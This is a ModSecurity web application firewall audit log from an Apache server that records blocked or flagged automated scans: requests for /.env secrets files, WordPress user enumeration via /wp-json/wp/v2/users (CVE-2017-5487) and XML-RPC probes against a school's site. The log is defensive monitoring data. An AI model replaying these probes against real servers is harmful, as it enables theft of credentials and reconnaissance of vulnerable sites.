Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ac43226-Z-- --66ac8234-A-- [04/May/2025:20:51:16 +0700] aBdw1GJEE9ao5dcyYWn5kwAAAIk 103.236.140.4 37944 103.236.140.4 8181 --66ac8234-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.170 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.170 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; Redmi 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36 Accept-Charset: utf-8 --66ac8234-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66ac8234-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746366676637580 845 (- - -) Stopwatch2: 1746366676637580 845; combined=333, p1=297, p2=0, p3=0, p4=0, p5=36, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66ac8234-Z-- --3b9d8777-A-- [04/May/2025:20:54:51 +0700] aBdxq-chPF6irSergtsEnQAAANI 103.236.140.4 37952 103.236.140.4 8181 --3b9d8777-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; Mi Note 3 Build/OPM1.171019.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 MQQBrowser/6.2 TBS/044813 Mobile Safari/537.36 MMWEBID/6858 MicroMessenger/7.0.5.1440(0x27000537) Process/tools NetType/4G Language/zh_CN Accept-Charset: utf-8 --3b9d8777-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b9d8777-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746366891392667 839 (- - -) Stopwatch2: 1746366891392667 839; combined=335, p1=291, p2=0, p3=0, p4=0, p5=44, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b9d8777-Z-- --091b2649-A-- [04/May/2025:21:00:31 +0700] aBdy__nZiHJYHUAF8QfmWQAAABA 103.236.140.4 38030 103.236.140.4 8181 --091b2649-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 157.245.36.108 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 157.245.36.108 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --091b2649-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --091b2649-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746367231396255 760 (- - -) Stopwatch2: 1746367231396255 760; combined=300, p1=274, p2=0, p3=0, p4=0, p5=26, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --091b2649-Z-- --27e7cc7d-A-- [04/May/2025:21:10:46 +0700] aBd1ZvnZiHJYHUAF8QfmcAAAAAg 103.236.140.4 38142 103.236.140.4 8181 --27e7cc7d-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 139.59.132.8 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 139.59.132.8 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --27e7cc7d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --27e7cc7d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746367846317398 875 (- - -) Stopwatch2: 1746367846317398 875; combined=317, p1=276, p2=0, p3=0, p4=0, p5=41, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27e7cc7d-Z-- --5620925d-A-- [04/May/2025:21:11:15 +0700] aBd1g2JEE9ao5dcyYWn5mQAAAJM 103.236.140.4 38200 103.236.140.4 8181 --5620925d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.108 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5620925d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5620925d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746367875553872 3215 (- - -) Stopwatch2: 1746367875553872 3215; combined=1406, p1=541, p2=831, p3=0, p4=0, p5=34, sr=174, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5620925d-Z-- --125efb72-A-- [04/May/2025:21:11:20 +0700] aBd1iOchPF6irSergtsEugAAAME 103.236.140.4 38204 103.236.140.4 8181 --125efb72-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.108 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --125efb72-C-- demo.sayHello --125efb72-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --125efb72-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746367880772337 6137 (- - -) Stopwatch2: 1746367880772337 6137; combined=4376, p1=585, p2=3573, p3=31, p4=33, p5=92, sr=83, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --125efb72-Z-- --23a4066f-A-- [04/May/2025:21:22:54 +0700] aBd4PvnZiHJYHUAF8QfmeAAAABI 103.236.140.4 38260 103.236.140.4 8181 --23a4066f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.111.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.111.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --23a4066f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --23a4066f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746368574178702 3549 (- - -) Stopwatch2: 1746368574178702 3549; combined=1520, p1=480, p2=1000, p3=0, p4=0, p5=40, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23a4066f-Z-- --86e96a78-A-- [04/May/2025:21:23:11 +0700] aBd4T_nZiHJYHUAF8QfmegAAAAA 103.236.140.4 38264 103.236.140.4 8181 --86e96a78-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.111.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.111.46 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --86e96a78-C-- demo.sayHello --86e96a78-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --86e96a78-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746368591654827 6461 (- - -) Stopwatch2: 1746368591654827 6461; combined=4702, p1=602, p2=3861, p3=39, p4=43, p5=94, sr=74, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86e96a78-Z-- --cfcac114-A-- [04/May/2025:21:31:23 +0700] aBd6O-chPF6irSergtsEyAAAANU 103.236.140.4 38322 103.236.140.4 8181 --cfcac114-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 165.227.173.41 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 165.227.173.41 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --cfcac114-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cfcac114-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746369083893144 787 (- - -) Stopwatch2: 1746369083893144 787; combined=327, p1=290, p2=0, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cfcac114-Z-- --9801a836-A-- [04/May/2025:21:39:54 +0700] aBd8OvnZiHJYHUAF8QfmigAAAAI 103.236.140.4 38452 103.236.140.4 8181 --9801a836-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.42.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.42.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9801a836-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9801a836-H-- Message: Access denied with code 403 (phase 2). 
Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746369594240622 3245 (- - -) Stopwatch2: 1746369594240622 3245; combined=1438, p1=458, p2=947, p3=0, p4=0, p5=33, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9801a836-Z-- --e66b5616-A-- [04/May/2025:21:40:01 +0700] aBd8QdsVQyl9V2B8Pt_CMwAAAEU 103.236.140.4 38464 103.236.140.4 8181 --e66b5616-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.42.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.42.110 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e66b5616-C-- demo.sayHello --e66b5616-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e66b5616-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746369601284104 4973 (- - -) Stopwatch2: 1746369601284104 4973; combined=3537, p1=463, p2=2848, p3=33, p4=34, p5=94, sr=59, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e66b5616-Z-- --dfcd4d25-A-- [04/May/2025:21:41:21 +0700] aBd8kfnZiHJYHUAF8QfmjQAAAAs 103.236.140.4 38474 103.236.140.4 8181 --dfcd4d25-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.161 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --dfcd4d25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dfcd4d25-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746369681963456 3142 (- - -) Stopwatch2: 1746369681963456 3142; combined=1395, p1=471, p2=891, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dfcd4d25-Z-- --3f2a734b-A-- [04/May/2025:21:41:29 +0700] aBd8mfnZiHJYHUAF8QfmjwAAAA8 103.236.140.4 38478 103.236.140.4 8181 --3f2a734b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.161 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3f2a734b-C-- demo.sayHello --3f2a734b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f2a734b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746369689715721 5572 (- - -) Stopwatch2: 1746369689715721 5572; combined=4140, p1=583, p2=3342, p3=27, p4=31, p5=92, sr=140, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f2a734b-Z-- --0715857a-A-- [04/May/2025:21:43:56 +0700] aBd9LNsVQyl9V2B8Pt_CNQAAAEo 103.236.140.4 38490 103.236.140.4 8181 --0715857a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.85.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.85.166 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0715857a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0715857a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746369836308117 2925 (- - -) Stopwatch2: 1746369836308117 2925; combined=1297, p1=469, p2=798, p3=0, p4=0, p5=29, sr=84, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0715857a-Z-- --bb4cf076-A-- [04/May/2025:21:44:01 +0700] aBd9MfnZiHJYHUAF8QfmkgAAABM 103.236.140.4 38494 103.236.140.4 8181 --bb4cf076-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.85.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.85.166 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bb4cf076-C-- demo.sayHello --bb4cf076-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb4cf076-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746369841007555 5785 (- - -) Stopwatch2: 1746369841007555 5785; combined=4168, p1=562, p2=3387, p3=31, p4=34, p5=92, sr=81, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb4cf076-Z-- --e8c93a6d-A-- [04/May/2025:21:44:57 +0700] aBd9adsVQyl9V2B8Pt_COAAAAEM 103.236.140.4 38504 103.236.140.4 8181 --e8c93a6d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.100 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e8c93a6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e8c93a6d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746369897714120 14922 (- - -) Stopwatch2: 1746369897714120 14922; combined=26031, p1=394, p2=685, p3=0, p4=0, p5=12490, sr=70, sw=0, l=0, gc=12462 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e8c93a6d-Z-- --01eb8f77-A-- [04/May/2025:21:45:04 +0700] aBd9cPnZiHJYHUAF8QfmkwAAABc 103.236.140.4 38508 103.236.140.4 8181 --01eb8f77-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.100 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --01eb8f77-C-- demo.sayHello --01eb8f77-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --01eb8f77-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746369904171681 6463 (- - -) Stopwatch2: 1746369904171681 6463; combined=4770, p1=597, p2=3935, p3=39, p4=42, p5=94, sr=75, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --01eb8f77-Z-- --47847607-A-- [04/May/2025:21:45:18 +0700] aBd9ftsVQyl9V2B8Pt_COwAAAFI 103.236.140.4 38512 103.236.140.4 8181 --47847607-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --47847607-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --47847607-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
